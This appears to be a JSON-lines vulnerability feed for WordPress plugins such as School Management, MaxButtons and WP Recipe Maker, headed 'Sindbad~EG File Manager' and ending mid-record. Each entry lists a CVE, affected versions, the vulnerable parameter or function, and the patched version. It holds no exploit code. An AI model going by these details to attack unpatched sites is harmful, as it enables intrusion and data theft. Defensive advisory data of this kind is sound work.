Sindbad~EG File Manager

{"CVE_ID":"CVE-2024-12609","slug":"school-management","versionImpact":"92.0.0","versionEndExcluding":"93.0.0","description":"The School Management System for Wordpress plugin for WordPress is vulnerable to SQL Injection via the 'view-attendance' page in all versions up to, and including, 92.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query in the mj_smgt_view_student_attendance() function.  This makes it possible for authenticated attackers, with Student-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 93.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8790df5-7228-4854-870c-1e6d3d0cfbaa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8790df5-7228-4854-870c-1e6d3d0cfbaa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12607","slug":"school-management","versionImpact":"92.0.0","versionEndExcluding":"93.0.0","description":"The School Management System for Wordpress plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter of the 'mj_smgt_show_event_task' AJAX action in all versions up to, and including, 92.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Custom-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 93.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/175fe7f4-ac92-4c52-9889-47635c21cd9b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/175fe7f4-ac92-4c52-9889-47635c21cd9b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9660","slug":"school-management","versionImpact":"91.5.0","versionEndExcluding":"92.0.0","description":"The School Management System for Wordpress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the mj_smgt_load_documets_new() and mj_smgt_load_documets() functions in all versions up to, and including, 91.5.0. This makes it possible for authenticated attackers, with Student-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 92.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b36fc50-7573-466e-883e-8d26f243c4d0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b36fc50-7573-466e-883e-8d26f243c4d0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9659","slug":"school-management","versionImpact":"91.5.0","versionEndExcluding":"92.0.0","description":"The School Management System for Wordpress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the mj_smgt_user_avatar_image_upload() function in all versions up to, and including, 91.5.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 92.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff1f303f-17fc-4006-b21b-5846216995da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff1f303f-17fc-4006-b21b-5846216995da?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2170","slug":"vk-all-in-one-expansion-unit","versionImpact":"9.96.0.1","versionEndExcluding":"9.97.0.0","description":"The VK All in One Expansion Unit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the child page index widget in all versions up to, and including, 9.96.0.1 due to insufficient input sanitization and output escaping on user supplied attributes such as 'className.' This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 9.97.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bc697b3-20f6-46df-a250-f2009a60200e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bc697b3-20f6-46df-a250-f2009a60200e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3058212%40vk-all-in-one-expansion-unit&new=3058212%40vk-all-in-one-expansion-unit&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3058212%40vk-all-in-one-expansion-unit&new=3058212%40vk-all-in-one-expansion-unit&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11181","slug":"greenshift-animation-and-page-builder-blocks","versionImpact":"9.9.9.3","versionEndExcluding":"9.9.9.4","description":"The Greenshift \u2013 animation and page builder blocks plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 9.9.9.3 via the 'wp_reusable_render' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to.","recommendation":"Update to version 9.9.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/settings.php#L1236\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/settings.php#L1236\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/settings.php#L43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/settings.php#L43\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203829\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203829\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/settings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06047667-2a24-4e1c-9389-11daceff4d23?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06047667-2a24-4e1c-9389-11daceff4d23?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-1609","slug":"school-management-pro","versionImpact":"9.9.6","versionEndExcluding":"9.9.7","description":"The School Management WordPress plugin before 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.","recommendation":"Update to version 9.9.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e2d546c9-85b6-47a4-b951-781b9ae5d0f2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e2d546c9-85b6-47a4-b951-781b9ae5d0f2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1207","slug":"booking","versionImpact":"9.9","versionEndExcluding":"9.9.1","description":"The WP Booking Calendar plugin for WordPress is vulnerable to SQL Injection via the 'calendar_request_params[dates_ddmmyy_csv]' parameter in all versions up to, and including, 9.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 9.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7802ed1f-138c-4a3d-916c-80fb4f7699b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7802ed1f-138c-4a3d-916c-80fb4f7699b2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3032596%40booking&new=3032596%40booking&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3032596%40booking&new=3032596%40booking&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4442","slug":"salon-booking-system","versionImpact":"9.8","versionEndExcluding":"9.9","description":"The Salon booking system plugin for WordPress is vulnerable to arbitrary file deletion in all versions up to, and including, 9.8. This is due to the plugin not properly validating the path of an uploaded file prior to deleting it. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible.","recommendation":"Update to version 9.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eaafeadd-f44c-49b1-b900-ef40800c629e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eaafeadd-f44c-49b1-b900-ef40800c629e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088196\\\/salon-booking-system#file14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088196\\\/salon-booking-system#file14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/tags\\\/9.8\\\/src\\\/SLN\\\/Action\\\/Ajax\\\/RemoveUploadedFile.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/tags\\\/9.8\\\/src\\\/SLN\\\/Action\\\/Ajax\\\/RemoveUploadedFile.php#L5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0937","slug":"vk-all-in-one-expansion-unit","versionEndExcluding":"9.87.1.0","description":"The VK All in One Expansion Unit WordPress plugin before 9.87.1.0 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5110ff02-c721-43eb-b13e-50aca25e1162\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5110ff02-c721-43eb-b13e-50aca25e1162\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0230","slug":"vk-all-in-one-expansion-unit","versionEndExcluding":"9.86.0.0","description":"The VK All in One Expansion Unit WordPress plugin before 9.86.0.0 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a4ad73b2-6a70-48ff-bf4c-28f81b193748\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a4ad73b2-6a70-48ff-bf4c-28f81b193748\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1503","slug":"wp-recipe-maker","versionImpact":"9.8.0","versionEndExcluding":"9.8.1","description":"The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Roundup Recipe Name field in all versions up to, and including, 9.8.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 9.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254687\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/class-wprm-list-saver.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254687\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/class-wprm-list-saver.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e23f63a0-3061-42e0-a6be-05fa20a174ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e23f63a0-3061-42e0-a6be-05fa20a174ea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8968","slug":"maxbuttons","versionImpact":"9.8.0","versionEndExcluding":"9.8.1","description":"The WordPress Button Plugin MaxButtons WordPress plugin before 9.8.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 9.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cab4d23e-e857-4b2f-b1ca-fbafd37524e0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cab4d23e-e857-4b2f-b1ca-fbafd37524e0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10555","slug":"maxbuttons","versionImpact":"9.8.0","versionEndExcluding":"9.8.1","description":"The WordPress Button Plugin MaxButtons WordPress plugin before 9.8.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 9.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fcc97635-e939-4cb4-9851-6f6ac4f6ad47\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fcc97635-e939-4cb4-9851-6f6ac4f6ad47\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6499","slug":"maxbuttons","versionImpact":"9.7.8","versionEndExcluding":"9.8.0","description":"The WordPress Button Plugin MaxButtons plugin for WordPress is vulnerable to information exposure in all versions up to, and including, 9.7.8. This makes it possible for unauthenticated attackers to obtain the full path to instances, which they may be able to use in combination with other vulnerabilities or to simplify reconnaissance work. On its own, this information is of very limited use.","recommendation":"Update to version 9.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdd0694c-ea7e-4cf8-a8d8-82a2b02fecdf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdd0694c-ea7e-4cf8-a8d8-82a2b02fecdf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maxbuttons\\\/trunk\\\/assets\\\/libraries\\\/font-awesome-5\\\/convert.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maxbuttons\\\/trunk\\\/assets\\\/libraries\\\/font-awesome-5\\\/convert.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3140369\\\/maxbuttons\\\/tags\\\/9.8.0\\\/assets\\\/libraries\\\/font-awesome-5\\\/convert.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3140369\\\/maxbuttons\\\/tags\\\/9.8.0\\\/assets\\\/libraries\\\/font-awesome-5\\\/convert.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4470","slug":"wp-reviews-plugin-for-google","versionEndExcluding":"9.8","description":"The Widgets for Google Reviews WordPress plugin before 9.8 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7c4e51b3-87ef-4afc-ab53-9a9bbdcfc9d7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7c4e51b3-87ef-4afc-ab53-9a9bbdcfc9d7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4889","slug":"shareaholic","versionImpact":"9.7.8","versionEndExcluding":"9.7.9","description":"The Shareaholic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'shareaholic' shortcode in versions up to, and including, 9.7.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 9.7.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff6932c6-f3ec-46a8-a03b-95512eee5bf1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff6932c6-f3ec-46a8-a03b-95512eee5bf1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2995413\\\/shareaholic#file51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2995413\\\/shareaholic#file51\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3026","slug":"maxbuttons","versionImpact":"9.7.7","versionEndExcluding":"9.7.8","description":"The WordPress Button Plugin MaxButtons WordPress plugin before 9.7.8 does not sanitise and escape some parameters, which could allow users with a role as low as editor to perform Cross-Site Scripting attacks","recommendation":"Update to version 9.7.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aba9d8a5-20a7-49e5-841c-9cfcb9bc6144\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aba9d8a5-20a7-49e5-841c-9cfcb9bc6144\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7029","slug":"maxbuttons","versionImpact":"9.7.6","versionEndExcluding":"9.7.7","description":"The WordPress Button Plugin MaxButtons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including 9.7.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: This vulnerability was partially fixed in version 9.7.6.","recommendation":"Update to version 9.7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bca0e8a0-d837-42d8-a9d3-35e0c820eb43?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bca0e8a0-d837-42d8-a9d3-35e0c820eb43?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3024075\\\/maxbuttons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3024075\\\/maxbuttons\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6594","slug":"maxbuttons","versionImpact":"9.7.4","versionEndExcluding":"9.7.6","description":"The WordPress Button Plugin MaxButtons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 9.7.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. Administrators can give button creation privileges to users with lower levels (contributor+) which would allow those lower-privileged users to carry out attacks.","recommendation":"Update to version 9.7.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfe2cabd-98f6-4ebc-8a02-e6951202aa88?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfe2cabd-98f6-4ebc-8a02-e6951202aa88?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3012872%40maxbuttons%2Ftrunk&old=2978023%40maxbuttons%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3012872%40maxbuttons%2Ftrunk&old=2978023%40maxbuttons%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4620","slug":"booking","versionImpact":"9.7.3","versionEndExcluding":"9.7.3.1","description":"The Booking Calendar WordPress plugin before 9.7.3.1 does not sanitize and escape some of its booking from data, allowing unauthenticated users to perform Stored Cross-Site Scripting attacks against administrators","recommendation":"Update to version 9.7.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/084e9494-2f9e-4420-9bf7-78a1a41433d7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/084e9494-2f9e-4420-9bf7-78a1a41433d7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9650","slug":"wp-recipe-maker","versionImpact":"9.6.1","versionEndExcluding":"9.7.0","description":"The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018tooltip\u2019 parameter in all versions up to, and including, 9.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 9.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/085d06e1-31d3-4c01-8d8e-588c04b79ae3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/085d06e1-31d3-4c01-8d8e-588c04b79ae3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-recipe-maker\\\/trunk\\\/assets\\\/js\\\/public\\\/tooltip.js#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-recipe-maker\\\/trunk\\\/assets\\\/js\\\/public\\\/tooltip.js#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173494\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173494\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-36503","slug":"maxbuttons","versionEndExcluding":"9.6","description":"Auth. (contributor+) Cross-Site Scripting (XSS) vulnerability in Max Foundry WordPress Button Plugin MaxButtons plugin <=\u00a09.5.3 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/maxbuttons\\\/wordpress-wordpress-button-plugin-maxbuttons-plugin-9-5-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/maxbuttons\\\/wordpress-wordpress-button-plugin-maxbuttons-plugin-9-5-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4100","slug":"wp-cerber","versionImpact":"9.4","versionEndExcluding":"9.5","description":"The WP Cerber Security plugin for WordPress is vulnerable to IP Protection bypass in versions up to, and including 9.4 due to the plugin improperly checking for a visitor's IP address. This makes it possible for an attacker whose IP address has been blocked to bypass this control by setting the X-Forwarded-For: HTTP header to an IP Address that hasn't been blocked.","recommendation":"Update to version 9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03ccd474-42f4-4cbb-823e-93fe4db1bf80?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03ccd474-42f4-4cbb-823e-93fe4db1bf80?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2865322\\\/wp-cerber\\\/trunk\\\/cerber-common.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2865322\\\/wp-cerber\\\/trunk\\\/cerber-common.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3490","slug":"wp-recipe-maker","versionImpact":"9.3.1","versionEndExcluding":"9.4.0","description":"The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wprm-recipe-roundup-item shortcode in all versions up to, and including, 9.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 9.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69cc7b6c-b6c2-4bba-afb4-86ba1b36b295?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69cc7b6c-b6c2-4bba-afb4-86ba1b36b295?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078644\\\/wp-recipe-maker\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078644\\\/wp-recipe-maker\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5062","slug":"woocommerce","versionImpact":"9.4.2","versionEndExcluding":"9.3.4","description":"The WooCommerce plugin for WordPress is vulnerable to PostMessage-Based Cross-Site Scripting via the 'customize-store' page in all versions up to, and including, 9.4.2 due to insufficient input sanitization and output escaping on PostMessage data. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to one of the following versions, or a newer patched version: 9.3.4, 9.4.3","refs":"[{\"url\":\"https:\\\/\\\/developer.woocommerce.com\\\/2024\\\/12\\\/03\\\/woocommerce-9-4-3-and-woocommerce-9-3-4-available-now\\\/\",\"name\":\"https:\\\/\\\/developer.woocommerce.com\\\/2024\\\/12\\\/03\\\/woocommerce-9-4-3-and-woocommerce-9-3-4-available-now\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/woocommerce\\\/woocommerce\\\/blob\\\/08dbc3b7dea140dd5dc19ee9c9ecd47dac0605b6\\\/plugins\\\/woocommerce\\\/client\\\/admin\\\/client\\\/customize-store\\\/utils.js#L39C1-L56C2\",\"name\":\"https:\\\/\\\/github.com\\\/woocommerce\\\/woocommerce\\\/blob\\\/08dbc3b7dea140dd5dc19ee9c9ecd47dac0605b6\\\/plugins\\\/woocommerce\\\/client\\\/admin\\\/client\\\/customize-store\\\/utils.js#L39C1-L56C2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/woocommerce\\\/woocommerce\\\/pull\\\/53405\\\/files\",\"name\":\"https:\\\/\\\/github.com\\\/woocommerce\\\/woocommerce\\\/pull\\\/53405\\\/files\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc2ee5bb-eeb8-4134-8f3f-b411e56457f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc2ee5bb-eeb8-4134-8f3f-b411e56457f0?source=cve\",\"refsource\":\"\",\"tags\":[